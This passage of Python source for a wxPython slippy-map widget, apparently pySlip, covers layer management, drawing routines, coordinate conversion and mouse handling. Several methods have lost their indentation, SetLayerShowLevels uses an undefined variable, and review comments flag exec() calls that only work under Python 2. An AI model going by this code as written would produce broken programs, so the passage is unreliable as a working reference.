bmp_cache = bmap = img.ConvertToBitmap()
(w, h) = bmap.GetSize()
w_cache = w
h_cache = h
draw_data.append((lon, lat, bmap, w, h, placement.lower(),
offset_x, offset_y, data))
return self.AddLayer(self.DrawImageLayer, draw_data, map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name,
type=self.TypeImage)
    def AddTextLayer(self, text, map_rel=True, visible=True, show_levels=None,
                     selectable=False, name='<text_layer>', update=True, **kwargs):
        """Add a text layer to the map.
        text         list of sequence of (lon, lat, text, [dict]) coordinates
        map_rel      points drawn relative to map if True, else view relative
        visible      True if the layer is to be immediately visible
        show_levels  list of levels at which layer is auto-shown
        selectable   True if select operates on this layer
        name         name of this layer
        update       True to redraw now if the new layer is visible
        kwargs       a dictionary of changeable text attributes
                     (placement, radius, fontname, fontsize, colour, data)
                     these supply any data missing in 'data'
        Returns the unique ID of the new layer.
        """
        # map- and view-relative text have separate class-level defaults
        if map_rel:
            default_placement = kwargs.get('placement', self.DefaultTextPlacement)
            default_radius = kwargs.get('radius', self.DefaultTextRadius)
            default_fontname = kwargs.get('fontname', self.DefaultTextFontname)
            default_fontsize = kwargs.get('fontsize', self.DefaultTextFontSize)
            default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
                                              self.DefaultTextColour)
            default_textcolour = self.get_i18n_kw(kwargs,
                                                  ('textcolour', 'textcolor'),
                                                  self.DefaultTextTextColour)
            default_offset_x = kwargs.get('offset_x', self.DefaultTextOffsetX)
            default_offset_y = kwargs.get('offset_y', self.DefaultTextOffsetY)
            default_data = kwargs.get('data', self.DefaultTextData)
        else:
            default_placement = kwargs.get('placement', self.DefaultTextViewPlacement)
            default_radius = kwargs.get('radius', self.DefaultTextViewRadius)
            default_fontname = kwargs.get('fontname', self.DefaultTextViewFontname)
            default_fontsize = kwargs.get('fontsize', self.DefaultTextViewFontSize)
            default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
                                              self.DefaultTextViewColour)
            default_textcolour = self.get_i18n_kw(kwargs,
                                                  ('textcolour', 'textcolor'),
                                                  self.DefaultTextViewTextColour)
            default_offset_x = kwargs.get('offset_x', self.DefaultTextViewOffsetX)
            default_offset_y = kwargs.get('offset_y', self.DefaultTextViewOffsetY)
            default_data = kwargs.get('data', self.DefaultTextData)
        # create data iterable ready for drawing
        draw_data = []
        for t in text:
            if len(t) == 4:
                (lon, lat, tdata, attributes) = t
            elif len(t) == 3:
                (lon, lat, tdata) = t
                attributes = {}
            else:
                msg = ('Text data must be iterable of tuples: '
                       '(lon, lat, text, [dict])\n'
                       'Got: %s' % str(t))
                raise Exception(msg)
            # plug in any required defaults
            # (per-text attributes override the layer-wide defaults)
            placement = attributes.get('placement', default_placement)
            radius = attributes.get('radius', default_radius)
            fontname = attributes.get('fontname', default_fontname)
            fontsize = attributes.get('fontsize', default_fontsize)
            colour = self.get_i18n_kw(attributes, ('colour', 'color'),
                                      default_colour)
            textcolour = self.get_i18n_kw(attributes,
                                          ('textcolour', 'textcolor'),
                                          default_textcolour)
            offset_x = attributes.get('offset_x', default_offset_x)
            offset_y = attributes.get('offset_y', default_offset_y)
            data = attributes.get('data', default_data)
            draw_data.append((lon, lat, tdata, placement.lower(),
                              radius, colour, textcolour, fontname, fontsize,
                              offset_x, offset_y, data))
        return self.AddLayer(self.DrawTextLayer, draw_data, map_rel,
                             visible=visible, show_levels=show_levels,
                             selectable=selectable, name=name,
                             type=self.TypeText, update=update)
def AddLayer(self, render, data, map_rel, visible, show_levels,
selectable, name, type, update=True):
"""Add a generic layer to the system.
render the function used to render the layer
data actual layer data (depends on layer type)
map_rel True if points are map relative, else view relative
visible True if layer is to be immediately shown, else False
show_levels list of levels at which to auto-show the layer
selectable True if select operates on this layer
name name for this layer
type flag for layer 'type'
Returns unique ID of the new layer.
"""
# get layer ID
id = self.next_layer_id
self.next_layer_id += 1
# prepare the show_level value
if show_levels is None:
show_levels = range(self.min_level, self.max_level + 1)
# create layer, add unique ID to Z order list
l = _Layer(id=id, painter=render, data=data, map_rel=map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name, type=type)
self.layer_mapping[id] = l
self.layer_z_order.append(id)
# force display of new layer if it's visible
if visible and update:
self.Update()
return id
######
# Layer manipulation routines.
######
def ShowLayer(self, id):
"""Show a layer.
id the layer id
"""
self.layer_mapping[id].visible = True
self.Update()
def HideLayer(self, id):
"""Hide a layer.
id the layer id
"""
self.layer_mapping[id].visible = False
self.Update()
def DeleteLayer(self, id, update=True):
"""Delete a layer.
id the layer id
"""
# just in case we got None
if id:
# see if what we are about to remove might be visible
visible = self.layer_mapping[id].visible
del self.layer_mapping[id]
self.layer_z_order.remove(id)
# if layer was visible, refresh display
if visible and update:
self.Update()
def SetLayerShowLevels(self, id, show_levels=None):
"""Update the show_levels list for a layer.
id ID of the layer we are going to update
show_levels new layer show list
"""
# just in case we got None
if id:
layer = self.layer_mapping[id]
# prepare the show_level value
if show_levels is None:
show_levels = range(self.min_level, self.max_level + 1)[:]
layer.show_levels = show_levels
# if layer was visible, refresh display
if visible:
self.Update()
def SetLayerSelectable(self, id, selectable=False):
"""Update the .selectable attribute for a layer.
id ID of the layer we are going to update
selectable new .selectable attribute value (True or False)
"""
# just in case we got None
if id:
layer = self.layer_mapping[id]
layer.selectable = selectable
######
# Play with layers Z order
######
def PushLayerToBack(self, id):
"""Make layer specified be drawn at back of Z order.
id ID of the layer to push to the back
"""
self.layer_z_order.remove(id)
self.layer_z_order.insert(0, id)
self.Update()
def PopLayerToFront(self, id):
"""Make layer specified be drawn at front of Z order.
id ID of the layer to pop to the front
"""
self.layer_z_order.remove(id)
self.layer_z_order.append(id)
self.Update()
def PlaceLayerBelowLayer(self, id, top_id):
"""Place a layer so it will be drawn behind another layer.
id ID of layer to place underneath 'top_id'
top_id ID of layer to be drawn *above* 'id'
"""
self.layer_z_order.remove(id)
i = self.layer_z_order.index(top_id)
self.layer_z_order.insert(i, id)
self.Update()
######
# Layer drawing routines
######
    def LightweightDrawPointLayer2(self, dc, data, map_rel):
        """Draw a points layer.
        dc       the device context to draw on
        data     an iterable of point tuples:
                     (x, y, place, radius, colour, x_off, y_off, pdata)
        map_rel  points relative to map if True, MUST BE TRUE for lightweight
        Assumes all points are the same colour, saving 100's of ms.
        In contrast to LightweightDrawPointLayer, this function draws
        rectangles or points (rather than circles) for performance reasons.
        """
        assert map_rel is True
        if len(data)==0: return
        # pen/brush colour comes from the first point only
        (lon, lat, place,
         radius, colour, x_off, y_off, pdata) = data[0]
        # draw points on map/view
        if map_rel:
            # GCDC device context permits antialiasing and transparent colors.
            # But, significant time savings by not allowing these features
            # It's not clear that we actually want or use them anyway
            #dc = wx.GCDC(dc) # allow transparent colours
            dc.SetPen(wx.Pen(colour))
            dc.SetBrush(wx.Brush(colour))
            points = []
            rectangles = []
            if radius:
                diameter = 2 * radius
            # NOTE(review): 'diameter' above is derived from the FIRST
            # point's radius; a zero first radius followed by non-zero
            # radii would raise NameError below -- presumably the layer
            # has a uniform radius, like the uniform colour. Confirm.
            for (lon, lat, place,
                 radius, colour, x_off, y_off, pdata) in data:
                pt = self.ConvertGeo2ViewMasked((lon, lat))
                if pt:
                    (x, y) = pt
                    if radius:
                        rectangles.append(
                            (x + x_off - radius, y + y_off - radius,
                             diameter, diameter))
                    else:
                        points.append((x + x_off, y + y_off))
            # batch draw calls: one C-level call per shape kind
            if len(points):
                dc.DrawPointList(points)
            if len(rectangles):
                dc.DrawRectangleList(rectangles)
    def LightweightDrawPointLayer(self, dc, data, map_rel):
        """Draw a points layer.
        dc       the device context to draw on
        data     an iterable of point tuples:
                     (x, y, place, radius, colour, x_off, y_off, pdata)
        map_rel  points relative to map if True, MUST BE TRUE for lightweight
        Assumes all points are the same colour, saving 100's of ms.
        """
        assert map_rel is True
        if len(data)==0: return
        # pen/brush colour comes from the first point only
        (lon, lat, place,
         radius, colour, x_off, y_off, pdata) = data[0]
        # draw points on map/view
        if map_rel:
            # GCDC device context permits antialiasing and transparent colors.
            # But, significant time savings by not allowing these features
            # It's not clear that we actually want or use them anyway
            #dc = wx.GCDC(dc) # allow transparent colours
            dc.SetPen(wx.Pen(colour))
            dc.SetBrush(wx.Brush(colour))
            for (lon, lat, place,
                 radius, colour, x_off, y_off, pdata) in data:
                pt = self.ConvertGeo2ViewMasked((lon, lat))
                if pt:
                    (x, y) = pt
                    if radius:
                        dc.DrawCircle(x + x_off, y + y_off, radius)
    def DrawPointLayer(self, dc, data, map_rel):
        """Draw a points layer.
        dc       the device context to draw on
        data     an iterable of point tuples:
                     (x, y, place, radius, colour, x_off, y_off, pdata)
        map_rel  points relative to map if True, else relative to view
        """
        # draw points on map/view
        if map_rel:
            dc = wx.GCDC(dc)            # allow transparent colours
            for (lon, lat, place,
                 radius, colour, x_off, y_off, pdata) in data:
                # convert geo position to view (None if off-view)
                pt = self.ConvertGeo2ViewMasked((lon, lat))
                if pt:
                    dc.SetPen(wx.Pen(colour))
                    dc.SetBrush(wx.Brush(colour))
                    (x, y) = pt
                    if radius:
                        dc.DrawCircle(x + x_off, y + y_off, radius)
        else:
            # view-relative: place each point against the view edges
            (dc_w, dc_h) = dc.GetSize()
            dc_w2 = dc_w / 2
            dc_h2 = dc_h / 2
            dc_h -= 1
            dc_w -= 1
            dc = wx.GCDC(dc)            # allow transparent colours
            for (x, y, place, radius, colour, x_off, y_off, pdata) in data:
                dc.SetPen(wx.Pen(colour))
                dc.SetBrush(wx.Brush(colour))
                # pre-compiled placement snippet rebinds x & y using
                # dc_w/dc_h/x_off/y_off (see point_view_placement)
                # NOTE(review): exec() mutating function locals is a
                # Python 2 idiom; under Python 3 the rebinding of x/y
                # would not take effect -- verify target interpreter.
                exec(self.point_view_placement[place])
                if radius:
                    dc.DrawCircle(x, y, radius)
    def DrawPolygonLayer(self, dc, data, map_rel):
        """Draw a polygon layer.
        dc       the device context to draw on
        data     an iterable of polygon tuples:
                     (p, placement, width, colour, closed,
                      filled, fillcolour, offset_x, offset_y, data)
                 where p is an iterable of points: (x, y)
        map_rel  points relative to map if True, else relative to view
        """
        # draw polygons on map/view
        # closed outlines are collected into 'polygons', open ones into
        # 'lines'; each list is drawn with one batched wx call at the end
        polygons = []
        lines = []
        pens = []
        brushes = []
        if map_rel:
            # Draw points on map/view, using transparency if implemented.
            try:
                dc = wx.GCDC(dc)
            except NotImplementedError:
                pass
            for (p, place, width, colour, closed,
                 filled, fillcolour, x_off, y_off, pdata) in data:
                # gather all polygon points as view coords
                p_lonlat = []
                for lonlat in p:
                    (x, y) = self.ConvertGeo2View(lonlat)
                    if closed:
                        p_lonlat.append((x + x_off, y + y_off))
                    else:
                        # open polylines use a flat coordinate list
                        p_lonlat.extend((x + x_off, y + y_off))
                pens.append(wx.Pen(colour, width=width))
                if filled:
                    brushes.append(wx.Brush(fillcolour))
                else:
                    brushes.append(wx.TRANSPARENT_BRUSH)
                if closed:
                    polygons.append(p_lonlat)
                else:
                    lines.append(p_lonlat)
        else:
            (dc_w, dc_h) = dc.GetSize()
            dc_w2 = dc_w / 2
            dc_h2 = dc_h / 2
            dc_w -= 1
            dc_h -= 1
            dc = wx.GCDC(dc)            # allow transparent colours
            for (p, place, width, colour, closed,
                 filled, fillcolour, x_off, y_off, pdata) in data:
                # fetch the exec code, don't refetch for each point in polygon
                # NOTE(review): the placement snippet rebinds x & y via
                # exec(); mutating function locals this way only works
                # under Python 2 -- verify target interpreter.
                place_exec = self.poly_view_placement[place]
                pp = []
                for (x, y) in p:
                    exec(place_exec)
                    if closed:
                        pp.append((x, y))
                    else:
                        pp.extend((x, y))
                pens.append(wx.Pen(colour, width=width))
                if filled:
                    brushes.append(wx.Brush(fillcolour))
                else:
                    brushes.append(wx.TRANSPARENT_BRUSH)
                if closed:
                    polygons.append(pp)
                else:
                    lines.append(pp)
        if len(lines):
            dc.DrawLineList(lines, pens=pens)
        if len(polygons):
            dc.DrawPolygonList(polygons, pens=pens, brushes=brushes)
    def DrawImageLayer(self, dc, images, map_rel):
        """Draw an image Layer on the view.
        dc       the device context to draw on
        images   a sequence of image tuple sequences
                     (x,y,bmap,w,h,placement,offset_x,offset_y,idata)
        map_rel  points relative to map if True, else relative to view
        """
        # draw images on map/view
        if map_rel:
            for (lon, lat, bmap, w, h, place, x_off, y_off, idata) in images:
                # half-sizes used by the placement snippets
                w2 = w / 2
                h2 = h / 2
                # convert geo position to view (None if off-view)
                pt = self.ConvertGeo2ViewMasked((lon, lat))
                if pt:
                    (x, y) = pt
                    # NOTE(review): the placement snippet rebinds x & y
                    # via exec(); mutating function locals this way only
                    # works under Python 2 -- verify target interpreter.
                    exec(self.image_map_placement[place])
                    dc.DrawBitmap(bmap, x, y, False)
        else:
            (dc_w, dc_h) = dc.GetSize()
            dc_w2 = dc_w / 2
            dc_h2 = dc_h / 2
            for (x, y, bmap, w, h, place, x_off, y_off, idata) in images:
                w2 = w / 2
                h2 = h / 2
                exec(self.image_view_placement[place])
                dc.DrawBitmap(bmap, x, y, False)
    def DrawTextLayer(self, dc, text, map_rel):
        """Draw a text Layer on the view.
        dc       the device context to draw on
        text     a sequence of tuples:
                     (lon, lat, tdata, placement, radius, colour, fontname,
                      fontsize, offset_x, offset_y, tdata)
        map_rel  points relative to map if True, else relative to view
        """
        if text is None:
            return
        # draw text on map/view
        if map_rel:
            dc = wx.GCDC(dc)            # allow transparent colours
            for t in text:
                (lon, lat, tdata, place, radius, colour, textcolour,
                 fontname, fontsize, x_off, y_off, data) = t
                # convert geo position to view (returns None if off-view)
                pt = self.ConvertGeo2ViewMasked((lon, lat))
                if pt:
                    (x, y) = pt
                    # set font characteristics
                    dc.SetPen(wx.Pen(colour))
                    dc.SetBrush(wx.Brush(colour))
                    dc.SetTextForeground(colour)
                    font = wx.Font(fontsize, wx.SWISS, wx.NORMAL, wx.NORMAL,
                                   False, fontname)
                    dc.SetFont(font)
                    # draw hotpoint circle
                    if radius:
                        dc.DrawCircle(x, y, radius)
                    # place the text relative to hotpoint
                    # NOTE(review): the placement snippet rebinds x & y
                    # via exec(); mutating function locals this way only
                    # works under Python 2 -- verify target interpreter.
                    (w, h, _, _) = dc.GetFullTextExtent(tdata)
                    w2 = w / 2
                    h2 = h / 2
                    exec(self.text_map_placement[place])
                    dc.SetTextForeground(textcolour)
                    dc.DrawText(tdata, x, y)
        else:
            # we need the size of the DC
            (dc_w, dc_h) = dc.GetSize()
            dc_w2 = dc_w / 2
            dc_h2 = dc_h / 2
            dc_w -= 1
            dc_h -= 1
            dc = wx.GCDC(dc)            # allow transparent colours
            for t in text:
                # for each text element, get unpacked data
                (x, y, tdata, place, radius, colour, textcolour,
                 fontname, fontsize, x_off, y_off, data) = t
                # set font characteristics
                dc.SetPen(wx.Pen(colour))
                dc.SetBrush(wx.Brush(colour))
                dc.SetTextForeground(colour)
                font = wx.Font(fontsize, wx.SWISS, wx.NORMAL, wx.NORMAL,
                               False, fontname)
                dc.SetFont(font)
                # draw hotpoint circle - do placement with x & y zero
                (save_x, save_y) = (x, y)
                (w, h, w2, h2, x, y) = (0, 0, 0, 0, 0, 0)
                exec(self.text_view_placement[place])
                if radius:
                    dc.DrawCircle(x, y, radius)
                (x, y) = (save_x, save_y)
                # place the text relative to hotpoint
                (w, h, _, _) = dc.GetFullTextExtent(tdata)    # size of text
                w2 = w / 2
                h2 = h / 2
                exec(self.text_view_placement[place])
                dc.SetTextForeground(textcolour)
                dc.DrawText(tdata, x, y)
######
# Positioning methods
######
def GotoPosition(self, posn):
"""Set view to centre on a position in the current level.
posn a tuple (lon,lat) to centre view on
"""
(lon, lat) = posn
x = (lon - self.map_llon) * self.ppd_x
y = (self.map_tlat - lat) * self.ppd_y
self.view_offset_x = x - self.view_width / 2
self.view_offset_y = y - self.view_height / 2
# set the left/right/top/bottom lon/lat extents
self.RecalcViewLonLatLimits()
self.Update()
def GotoLevelAndPosition(self, level, posn):
"""Goto a map level and set view to centre on a position.
level the map level to use
posn a tuple (lon,lat) to centre view on
Does nothing if we can't use desired level.
"""
if self.ZoomToLevel(level):
self.GotoPosition(posn)
def ZoomToArea(self, posn, size):
"""Set view to level and position to view an area.
posn a tuple (lon,lat) to centre view on
size a tuple (width,height) of area in degrees
Centre an area and zoom to view such that the area will fill
approximately 50% of width or height, whichever is greater.
Use the ppd_x and ppd_y values in the level 'tiles.info' file.
"""
# unpack area width/height (degrees)
(awidth, aheight) = size
# step through levels (smallest first) and check view size (degrees)
for l in self.tiles.levels:
level = l
(_, _, ppd_x, ppd_y) = self.tiles.getInfo(l)
view_deg_width = self.view_width / ppd_x
view_deg_height = self.view_height / ppd_y
# if area >= 50% of view, finished
if awidth >= view_deg_width / 2 or aheight >= view_deg_height / 2:
break
self.GotoLevelAndPosition(level, posn)
######
# Convert between geo and view coordinates
######
def ConvertGeo2View(self, lonlat):
"""Convert a geo (lon+lat) position to view pixel coords.
lonlat (longitude, latitude) of point
Return screen pixels coordinates of the point (x,y).
"""
(lon, lat) = lonlat
return ((lon - self.view_llon) * self.ppd_x,
(self.view_tlat - lat) * self.ppd_y)
def ConvertGeo2ViewMasked(self, lonlat):
"""Convert a geo (lon+lat) position to view pixel coords.
lonlat (longitude, latitude) of point
Return screen pixels coordinates of the point (x,y) or None
if point is off-view.
"""
(lon, lat) = lonlat
if (self.view_llon <= lon <= self.view_rlon and
self.view_blat <= lat <= self.view_tlat):
return self.ConvertGeo2View(lonlat)
return None
def ConvertView2Geo(self, xy):
"""Convert an x,y view position to geo lon+lat.
xy tuple of view X & Y coordinate (pixels)
Return a tuple (lon, lat) - geo coordinates of the point.
"""
(x, y) = xy
# x_pix is from left map edge, y_pix from top map edge
x_pix = x + self.view_offset_x
y_pix = y + self.view_offset_y
lon = self.map_llon + x_pix / self.ppd_x
lat = self.map_tlat - y_pix / self.ppd_y
return (lon, lat)
######
# GUI stuff
######
    def OnMove(self, event):
        """Handle a mouse move (map drag or rectangle select).
        event  the mouse move event
        If SHIFT key is down, do rectangle select.
        Otherwise pan the map if we are dragging.
        """
        # for windows, set focus onto pyslip window
        # linux seems to do this automatically
        if sys.platform == 'win32' and self.FindFocus() != self:
            self.SetFocus()
        # get current mouse position
        # (GetPositionTuple is the wxPython classic/WX3 spelling)
        (x, y) = event.GetPositionTuple() if WX3 else event.GetPosition()
        self.RaiseMousePositionEvent((x, y))
        if event.Dragging() and event.LeftIsDown():
            # are we doing box select?
            if self.is_box_select:
                # set select box point 2 at mouse position
                (self.sbox_w, self.sbox_h) = (x - self.sbox_1_x,
                                              y - self.sbox_1_y)
            elif not self.last_drag_x is None:
                # no, just a map drag
                self.was_dragging = True
                dx = self.last_drag_x - x
                dy = self.last_drag_y - y
                # move the map in the view
                self.view_offset_x += dx
                self.view_offset_y += dy
                # adjust remembered X,Y
                self.last_drag_x = x
                self.last_drag_y = y
                # offsets changed, so the view's geo extent changed too
                self.RecalcViewLonLatLimits()
            # redraw client area
            self.Update()
def OnLeftDown(self, event):
    """Left mouse button down.  Prepare for possible drag."""
    click_posn = event.GetPositionTuple() if WX3 else event.GetPosition()
    if event.ShiftDown():
        # shift+click starts a box select: remember corner 1, zero extents
        self.is_box_select = True
        self.SetCursor(wx.StockCursor(wx.CURSOR_CROSS))
        (self.sbox_w, self.sbox_h) = (0, 0)
        (self.sbox_1_x, self.sbox_1_y) = click_posn
    else:
        # plain click may start a map drag: remember the drag origin
        self.is_box_select = False
        self.SetCursor(wx.StockCursor(wx.CURSOR_HAND))
        (self.last_drag_x, self.last_drag_y) = click_posn
    # allow other handlers to see this event too
    event.Skip()
def OnLeftUp(self, event):
    """Left mouse button up - finish a drag, box select or point select.

    Note that when we iterate through the layer_z_order list we must
    iterate on a *copy* as the user select process can modify
    self.layer_z_order.
    """
    self.last_drag_x = self.last_drag_y = None
    # a double-click handler may have asked us to skip this UP event
    if self.ignore_next_up:
        self.ignore_next_up = False
        return
    self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
    # we need a repaint to remove any selection box, but NOT YET!
    delayed_paint = self.sbox_1_x       # True if box select active
    # if any layers interested, inform of possible select
    if not self.was_dragging:
        if self.is_box_select:
            # possible box selection: compute both corners in view and geo coords
            ll_corner_v = (self.sbox_1_x, self.sbox_1_y)
            tr_corner_v = (self.sbox_1_x + self.sbox_w,
                           self.sbox_1_y + self.sbox_h)
            ll_corner_m = self.ConvertView2Geo(ll_corner_v)
            tr_corner_m = self.ConvertView2Geo(tr_corner_v)
            # check each layer for a box select event
            # we work on a copy as user response could change order
            for id in self.layer_z_order[:]:
                l = self.layer_mapping[id]
                # if layer visible and selectable
                if l.selectable and l.visible:
                    if l.map_rel:
                        # map-relative, get all points selected (if any)
                        p_data = self.layerBSelHandler[l.type](l,
                                                               ll_corner_m,
                                                               tr_corner_m)
                    else:
                        # view-relative
                        p_data = self.layerBSelHandler[l.type](l,
                                                               ll_corner_v,
                                                               tr_corner_v)
                    self.RaiseSelectEvent(EventBoxSelect, l, p_data)
                    # user code possibly updated screen
                    delayed_paint = True
            self.is_box_select = False
        else:
            # possible point selection
            clickpt_v = event.GetPositionTuple() if WX3 else event.GetPosition()
            clickpt_m = self.ConvertView2Geo(clickpt_v)
            # check each layer for a point select callback
            # we work on a copy as user callback could change order
            for id in self.layer_z_order[:]:
                l = self.layer_mapping[id]
                # if layer visible and selectable
                if l.selectable and l.visible and \
                   (l.type in self.layerPSelHandler):
                    if l.map_rel:
                        p_data = self.layerPSelHandler[l.type](l,
                                                               clickpt_m)
                    else:
                        p_data = self.layerPSelHandler[l.type](l,
                                                               clickpt_v)
                    self.RaiseSelectEvent(EventPointSelect, l, p_data,
                                          vposn=clickpt_v,
                                          mposn=clickpt_m)
                    # user code possibly updated screen
                    delayed_paint = True
    # turn off drag
    self.was_dragging = False
    # turn off box selection mechanism
    self.is_box_select = False
    self.sbox_1_x = self.sbox_1_y = None
    # force PAINT event if required
    if delayed_paint:
        self.Update()
def OnLeftDClick(self, event):
    """Left mouse button double-click.

    Zoom in (if possible).
    Zoom out (if possible) if shift key is down.
    """
    # ignore next Left UP event so it isn't treated as a select
    self.ignore_next_up = True
    # TODO: should ignore double-click off the map, but within view
    # a possible workaround is to limit minimum view level
    # get view coords of mouse double click, want same centre afterwards
    xy = event.GetPositionTuple() if WX3 else event.GetPosition()
    if event.ShiftDown():
        # zoom out if shift key also down
        if self.ZoomToLevel(self.level - 1):
            self.ZoomOut(xy)
    else:
        # zoom in
        if self.ZoomToLevel(self.level + 1):
            self.ZoomIn(xy)
    # Raise position event to update the status text.
    self.RaiseMousePositionEvent(xy)
def OnMiddleDown(self, event):
    """Middle mouse button down.  Do nothing in this version."""
    pass

def OnMiddleUp(self, event):
    """Middle mouse button up.  Do nothing in this version."""
    pass
def OnRightDown(self, event):
    """Right mouse button down.  Prepare for right select (no drag)."""
    click_posn = event.GetPositionTuple() if WX3 else event.GetPosition()
    if event.ShiftDown():
        # shift+right-click starts a right box select
        self.is_box_select = True
        self.SetCursor(wx.StockCursor(wx.CURSOR_CROSS))
        (self.sbox_w, self.sbox_h) = (0, 0)
        (self.sbox_1_x, self.sbox_1_y) = click_posn
    # allow other handlers to see this event too
    event.Skip()
def OnRightUp(self, event):
    """Right mouse button up - finish a right box or point select.

    Note that when we iterate through the layer_z_order list we must
    iterate on a *copy* as the user select process can modify
    self.layer_z_order.
    """
    # a double-click handler may have asked us to skip this UP event
    if self.ignore_next_right_up:
        self.ignore_next_right_up = False
        return
    self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
    # we need a repaint to remove any selection box, but NOT YET!
    delayed_paint = self.sbox_1_x       # True if box select active
    # if any layers interested, inform of possible select
    if self.is_box_select:
        # possible box selection: compute both corners in view and geo coords
        ll_corner_v = (self.sbox_1_x, self.sbox_1_y)
        tr_corner_v = (self.sbox_1_x + self.sbox_w,
                       self.sbox_1_y + self.sbox_h)
        ll_corner_m = self.ConvertView2Geo(ll_corner_v)
        tr_corner_m = self.ConvertView2Geo(tr_corner_v)
        # check each layer for a box select event
        # we work on a copy as user response could change order
        for id in self.layer_z_order[:]:
            l = self.layer_mapping[id]
            if l.selectable and l.visible:      # and l.event_box_select:
                if l.map_rel:
                    # map-relative, get all points selected (if any)
                    pts = self.layerBSelHandler[l.type](l, ll_corner_m,
                                                        tr_corner_m)
                else:
                    # view-relative
                    pts = self.layerBSelHandler[l.type](l, ll_corner_v,
                                                        tr_corner_v)
                self.RaiseSelectEvent(EventRightBoxSelect, l, pts)
                # user code possibly updated screen
                delayed_paint = True
        self.is_box_select = False
    else:
        # possible point selection
        clickpt_v = event.GetPositionTuple() if WX3 else event.GetPosition()
        clickpt_m = self.ConvertView2Geo(clickpt_v)
        # check each layer for a point select callback
        # we work on a copy as user callback could change order
        for id in self.layer_z_order[:]:
            l = self.layer_mapping[id]
            # if layer visible, selectable and there is a callback
            if l.selectable and l.visible:
                if l.map_rel:
                    pt = self.layerPSelHandler[l.type](l, clickpt_m)
                else:
                    pt = self.layerPSelHandler[l.type](l, clickpt_v)
                self.RaiseSelectEvent(EventRightPointSelect, l, pt,
                                      mposn=clickpt_m,
                                      vposn=clickpt_v)
                # user code possibly updated screen
                delayed_paint = True
    # turn off box selection mechanism
    self.is_box_select = False
    self.sbox_1_x = self.sbox_1_y = None
    # force PAINT event to remove selection box (if required)
    if delayed_paint:
        self.Update()
def OnRightDClick(self, event):
    """Right mouse button double-click."""
    # ignore next RIGHT UP event so it isn't treated as a select
    self.ignore_next_right_up = True
def OnMouseWheel(self, event):
    """Mouse wheel event - zoom keeping the point under the cursor fixed."""
    # get current mouse position
    mouse_x, mouse_y = event.GetPositionTuple() if WX3 else event.GetPosition()
    # remember the geo position under the cursor before zooming
    mouse_latlon = self.ConvertView2Geo((mouse_x, mouse_y))
    # get center of view in map coords
    x, y = self.view_width/2, self.view_height/2
    # determine which way to zoom, & *can* we zoom?
    if event.GetWheelRotation() > 0:
        if self.ZoomToLevel(self.level + 1):
            self.ZoomIn((x, y), update=False)
    else:
        if self.ZoomToLevel(self.level - 1):
            self.ZoomOut((x, y), update=False)
    # Translate the map so that the point under the mouse cursor is the same
    # after zooming in/out as before
    new_mouse_x, new_mouse_y = self.ConvertGeo2View(mouse_latlon)
    new_center = (x + (new_mouse_x - mouse_x),
                  y + (new_mouse_y - mouse_y))
    self.GotoPosition(self.ConvertView2Geo(new_center))
    # Raise position event to update the status text.
    self.RaiseMousePositionEvent(event.GetPositionTuple() if WX3 else event.GetPosition())
######
# Method that overrides _BufferedCanvas.Draw() method.
# This code does the actual drawing of tiles, layers, etc.
######
def Draw(self, dc):
    """Do actual map tile and layers drawing.
    Overrides the _BufferedCanvas.draw() method.

    dc  device context to draw on

    The idea is to create 3 data structures that define the tiles
    to be drawn and where to draw them:
        row_list  list (left -> right) of tile rows
        col_list  list (left -> right) of tile columns
        posn      position at which to draw first (top-left) tile

    We will need this when we go to the 'wrap-around' feature.
    """
    import math     # NKS allow negative tile coordinates
    # figure out how to draw tiles
    if False:  # self.view_offset_x < 0:  NKS No wrapping or hard boundaries
        # View > Map in X - centre in X direction
        if self.EW_wrap:
            tile_margin = ((-self.view_offset_x + self.tile_size_x - 1) //
                           self.tile_size_x)
            col_start = (self.tiles.num_tiles_x -
                         tile_margin % self.tiles.num_tiles_x)
            col_list = []
            for i in range(2 * tile_margin + self.tiles.num_tiles_x):
                ii = (i + col_start) % self.tiles.num_tiles_x
                col_list.append(ii)
            x_pix = (self.view_offset_x
                     + (tile_margin - 1) * self.tile_size_x)
        else:
            col_list = range(0, self.tiles.num_tiles_x)
            x_pix = -self.view_offset_x
    else:
        # Map > View - determine layout in X direction
        x_offset = self.view_offset_x + self.move_dx
        start_x_tile = int(math.floor(x_offset / self.tile_size_x))
        stop_x_tile = ((x_offset + self.view_width + self.tile_size_x - 1)
                       / self.tile_size_x)
        stop_x_tile = int(stop_x_tile)
        col_list = range(start_x_tile, stop_x_tile)
        # bug fix: this previously used tile_size_y in an X computation,
        # which is only correct when tiles are square
        x_pix = start_x_tile * self.tile_size_x - x_offset
    if False:  # self.view_offset_y < 0:  NKS No wrapping or hard boundaries
        # View > Map in Y - centre in Y direction
        if self.NS_wrap:
            tile_margin = ((-self.view_offset_y + self.tile_size_y - 1)
                           // self.tile_size_y)
            row_start = (self.tiles.num_tiles_y
                         - tile_margin % self.tiles.num_tiles_y)
            row_list = []
            for i in range(2 * tile_margin + self.tiles.num_tiles_y):
                ii = (i + row_start) % self.tiles.num_tiles_y
                row_list.append(ii)
            y_pix_start = self.view_offset_y + \
                          (tile_margin - 1) * self.tile_size_y
        else:
            row_list = range(0, self.tiles.num_tiles_y)
            y_pix_start = -self.view_offset_y
    else:
        # Map > View - determine layout in Y direction
        y_offset = self.view_offset_y + self.move_dy
        start_y_tile = int(math.floor(y_offset / self.tile_size_y))
        stop_y_tile = ((y_offset + self.view_height
                        + self.tile_size_y - 1) / self.tile_size_y)
        stop_y_tile = int(stop_y_tile)
        row_list = range(start_y_tile, stop_y_tile)
        y_pix_start = start_y_tile * self.tile_size_y - y_offset
    # start pasting tiles onto the view, column by column
    for x in col_list:
        y_pix = y_pix_start
        for y in row_list:
            dc.DrawBitmap(self.tiles.GetTile(x, y), x_pix, y_pix, False)
            y_pix += self.tile_size_y
        x_pix += self.tile_size_x
    # draw layers (bottom to top in Z order)
    for id in self.layer_z_order:
        l = self.layer_mapping[id]
        if l.visible and self.level in l.show_levels:
            l.painter(dc, l.data, map_rel=l.map_rel)
    # draw selection rectangle, if any (blue outline, transparent fill)
    if self.sbox_1_x:
        penclr = wx.Colour(0, 0, 255)
        dc.SetPen(wx.Pen(penclr, width=1))
        brushclr = wx.Colour(0, 0, 0)
